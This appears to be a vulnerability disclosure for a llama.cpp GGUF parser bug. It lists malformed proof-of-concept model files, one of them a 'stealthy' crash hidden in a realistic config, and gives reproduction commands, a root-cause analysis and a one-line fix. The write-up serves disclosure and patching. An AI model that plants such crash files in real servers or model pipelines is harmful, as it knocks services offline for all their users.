# GGUF Division-by-Zero Crash PoC

- **Vulnerability:** division by zero (SIGFPE) in the llama.cpp GGUF parser
- **Location:** `ggml/src/gguf.cpp`, lines 550-552
- **Affected:** all llama.cpp tools (`llama-gguf`, `llama-simple`, `llama-cli`, `llama-server`)
- **Severity:** DoS (immediate process kill, no recovery)
- **Tested on:** llama.cpp HEAD (`ff4affb`, 2026-02-15)

## PoC Files

| File | Size | Description | Crash location |
|------|------|-------------|----------------|
| `poc_divzero_ne1.gguf` | 65 B | `ne[1] = 0` | `gguf.cpp:550` |
| `poc_divzero_ne2.gguf` | 73 B | `ne[2] = 0` | `gguf.cpp:551` |
| `poc_divzero_ne3.gguf` | 81 B | `ne[3] = 0` | `gguf.cpp:552` |
| `poc_stealthy_divzero.gguf` | 224 B | Hidden in a realistic model config | `gguf.cpp:551` |
| `poc_oom_string.gguf` | 48 B | Uncontrolled string allocation | OOM |
| `poc_invalid_kv_type.gguf` | 48 B | Invalid `gguf_type` enum | UB (enum load) |
| `poc_invalid_tensor_type.gguf` | 65 B | Invalid `ggml_type` enum | UB (enum load) |

## Reproduction

```sh
git clone https://github.com/ggml-org/llama.cpp
cd llama.cpp && cmake -B build . && cmake --build build
wget https://huggingface.co/Rammadaeus/gguf-divzero-crash-poc/resolve/main/poc_divzero_ne1.gguf
./build/bin/llama-gguf poc_divzero_ne1.gguf r
echo $?  # 136 = 128 + SIGFPE (8)
```

## Root Cause

The validation at line 541 rejects `ne[j] < 0` but lets zero through. Lines 550-552 then divide `INT64_MAX` by `ne[1]`, `ne[2]`, and `ne[3]` in an overflow guard:

```cpp
// gguf.cpp:550-552 — overflow guard dividing by attacker-controlled dimensions
if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) ||
           (INT64_MAX/info.t.ne[2] <= info.t.ne[0]*info.t.ne[1]) ||
           (INT64_MAX/info.t.ne[3] <= info.t.ne[0]*info.t.ne[1]*info.t.ne[2]))) {
```

**Fix:** change the check at line 541 from `ne[j] < 0` to `ne[j] <= 0`, so zero-sized dimensions are rejected before the divisions run.

## Impact

- Every llama.cpp tool crashes immediately on load
- `llama-server`: one malicious model file kills the server for **all** connected clients
- Automated model pipelines crash with no recovery
- ProtectAI ModelScan 0.8.7 does **not** detect this (it skips GGUF files entirely)